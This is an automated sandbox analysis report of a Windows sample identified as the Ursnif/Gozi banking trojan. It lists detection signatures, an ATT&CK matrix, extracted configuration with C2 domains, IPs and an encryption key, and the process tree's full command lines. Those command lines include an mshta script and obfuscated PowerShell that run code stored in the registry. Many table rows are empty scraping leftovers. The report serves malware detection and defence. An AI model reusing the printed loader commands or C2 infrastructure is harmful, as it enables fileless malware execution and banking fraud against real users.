Edit tour
Windows
Analysis Report
bf.exe
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- bf.exe (PID: 1364 cmdline:
C:\Users\u ser\Deskto p\bf.exe MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6) - control.exe (PID: 4784 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- mshta.exe (PID: 5064 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Ffsw='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Ffsw).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 4604 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name rxih ymmmsf -va lue gp; ne w-alias -n ame qvfmhh dt -value iex; qvfmh hdt ([Syst em.Text.En coding]::A SCII.GetSt ring((rxih ymmmsf "HK CU:Softwar e\AppDataL ow\Softwar e\Microsof t\54E80703 -A337-A6B8 -CDC8-873A 517CAB0E") .UrlsRetur n)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6048 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\4rgoqrx w.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 4720 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESE2A5.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC C346B8403E 7B4A1592C5 75AE396751 3E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 3340 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\n2sgiao a.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 2888 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESEB8E.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 1B282484FF BD4A98A4CB D8847ACCD8 A8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3324 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cleanup
{"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Windows_Trojan_Gozi_fd494041 | unknown | unknown |
| |
Windows_Trojan_Gozi_261f5ac5 | unknown | unknown |
| |
Windows_Trojan_Gozi_fd494041 | unknown | unknown |
| |
Windows_Trojan_Gozi_261f5ac5 | unknown | unknown |
| |
Click to see the 60 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 1 entries |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp: | 192.168.2.545.8.158.10449696802033204 10/13/22-09:30:54.079674 |
SID: | 2033204 |
Source Port: | 49696 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.545.8.158.10449696802033203 10/13/22-09:30:55.414317 |
SID: | 2033203 |
Source Port: | 49696 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Avira: |
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 12_2_004963E0 | |
Source: | Code function: | 12_2_0049D6F0 | |
Source: | Code function: | 12_2_004A8868 | |
Source: | Code function: | 12_2_0048887C | |
Source: | Code function: | 12_2_0049887C | |
Source: | Code function: | 12_2_004A9010 | |
Source: | Code function: | 12_2_0048A89C | |
Source: | Code function: | 12_2_0048B14C | |
Source: | Code function: | 12_2_0049594C | |
Source: | Code function: | 12_2_0049996C | |
Source: | Code function: | 12_2_00482178 | |
Source: | Code function: | 12_2_00495108 | |
Source: | Code function: | 12_2_004929EC | |
Source: | Code function: | 12_2_0049F26C | |
Source: | Code function: | 12_2_0049DA04 | |
Source: | Code function: | 12_2_00494A1C | |
Source: | Code function: | 12_2_0048E2D4 | |
Source: | Code function: | 12_2_0048D2F4 | |
Source: | Code function: | 12_2_0048C340 | |
Source: | Code function: | 12_2_0049FBE8 | |
Source: | Code function: | 12_2_004863F0 | |
Source: | Code function: | 12_2_004833F4 | |
Source: | Code function: | 12_2_00488BB0 | |
Source: | Code function: | 12_2_004983B4 | |
Source: | Code function: | 12_2_00490C28 | |
Source: | Code function: | 12_2_00497484 | |
Source: | Code function: | 12_2_004A7498 | |
Source: | Code function: | 12_2_004A6D20 | |
Source: | Code function: | 12_2_004A45A0 | |
Source: | Code function: | 12_2_004A1E44 | |
Source: | Code function: | 12_2_004A466A | |
Source: | Code function: | 12_2_00481E64 | |
Source: | Code function: | 12_2_004A8604 | |
Source: | Code function: | 12_2_00499E18 | |
Source: | Code function: | 12_2_00492EC4 | |
Source: | Code function: | 12_2_0048B6DC | |
Source: | Code function: | 12_2_004926E8 | |
Source: | Code function: | 12_2_0049AEF8 | |
Source: | Code function: | 12_2_004A4694 | |
Source: | Code function: | 12_2_004846B0 | |
Source: | Code function: | 12_2_00498F68 | |
Source: | Code function: | 12_2_004897E0 | |
Source: | Code function: | 12_2_00493FF8 |
Source: | Code function: | 12_2_004A0A50 | |
Source: | Code function: | 12_2_0049342C | |
Source: | Code function: | 12_2_00494E14 | |
Source: | Code function: | 12_2_0049E6C4 | |
Source: | Code function: | 12_2_004BD002 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Virustotal: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | User mode code has changed: |
Source: | IAT of a user mode module has changed: |
Source: | EAT of a user mode module has changed: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 12_2_004963E0 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 2 Windows Management Instrumentation | Path Interception | 412 Process Injection | 4 Rootkit | 3 Credential API Hooking | 1 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 3 Credential API Hooking | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
